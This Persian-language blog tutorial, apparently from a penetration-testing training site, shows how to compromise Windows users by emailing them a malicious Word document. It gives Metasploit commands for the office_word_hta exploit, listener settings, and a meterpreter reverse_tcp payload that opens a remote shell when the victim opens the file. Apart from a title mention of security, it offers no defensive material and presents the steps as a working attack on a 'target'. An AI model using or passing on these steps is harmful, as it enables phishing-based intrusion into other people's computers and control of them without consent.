هک با ایمیل و فایل .doc چگونه انجام میشود ؟ + امنیت

هک با ایمیل

اموزش هک با ایمیل و ارسال فایل با فرمت .doc (ورد) در ادامه این اموزش جالب و کاربردی با ما همراه باشید

هک با ایمیل و فایل ضمیمه با پسوند .doc

یکی از راه های کلاینت هکینگ که بسیار انجام میشود ارسال ایمیل های الوده است که به روش های مختلفی استفاده میکنند برای مثال در اموزش های قبل در رابطه با فیشینگ و ارسال ایمیل به شما توضیح دادیم که نفوذگر با ارسال یک ایمیل فیشینگ یه بعضی اطلاعات شما میتواند دسترسی پیدا کند میتوانید با کمی جستجو اموزش ان را مشاهده کنید اما در این اموزش میخواهیم با ارسال یک فایل .doc از طریق ایمیل به تارگت دسترسی پیدا کنیم که تمامی راه نفوذ از طریق هک با ایمیل خواهد بود
 

ساخت پیلود با فرمت .doc

برای ساخت یک پیلود با فرمت .doc از متاسپلویت در کالی لینوکس استفاده میکنیم. ابتدا وارد محیط کالی لینوکس شده و متاسپلویت را اجرا کنید یا از طریق ترمینال دستور زیر را بزنید
نکته : این روش فقط مناسب برای هک سیستم عامل ویندوز است و بر روی سیستم عامل های دیگر جواب نخواهد داد ، میتوانید اموزش هک مک و هک لینوکس را مشاهده کنید

msfconsole

با دستور زیر در متاسپلویت وارد اکسپلویت مورد نظر شوید

use exploit/windows/fileformat/office_word_hta

برای مشاهده بخش های  از دستور زیر استفاده کنید

show options

هک با ایمیل و فایل .doc چگونه انجام میشود ؟ + امنیت
حال ip و پورت خود را با دستورات زیر ست کنید

set SRVHOST 127.0.0.1

set RHOST 127.0.0.1

set LHOST 127.0.0.1

set LPORT 6060

set SRVPORT 6060

هک با ایمیل و فایل .doc چگونه انجام میشود ؟ + امنیت
دستور exploit را زده تا فایل ورد ، برای ارسال و هک با ایمیل ایجاد شود ادرس و محل ذخیره ان نمایان میشود و کافیست فایل را برداشته و از طریق ایمیل ارسال کنید
برای کنترل و بازکردن پورت در سیستم خود از دستورات زیر استفاده کنید, پیلود مورد نظر را ست کنید

set payload windows/meterpreter/reverse_tcp

مجدد پورت و ip را دقیقا مانند دستور بالا ست کنید

set SRVHOST 127.0.0.1

….

سپس دستور زیر را بزنید و منتظر اجرا کردن فایل ورد توسط کلاینت شوید

exploit -j

هک با ایمیل و فایل .doc چگونه انجام میشود ؟ + امنیت
امیدواریم از این اموزش لذت برده باشید

پایدار باشید.

0/5 (0 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های امنیت شبکه و راه های مقابله با نفوذ ، در 7 سال گذشته متمرکز بر مباحث روز امنیت سایبری بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

قوانین پن تست کور
دوره کالی لینوکس
نماد های اعتماد
نماد های اعتماد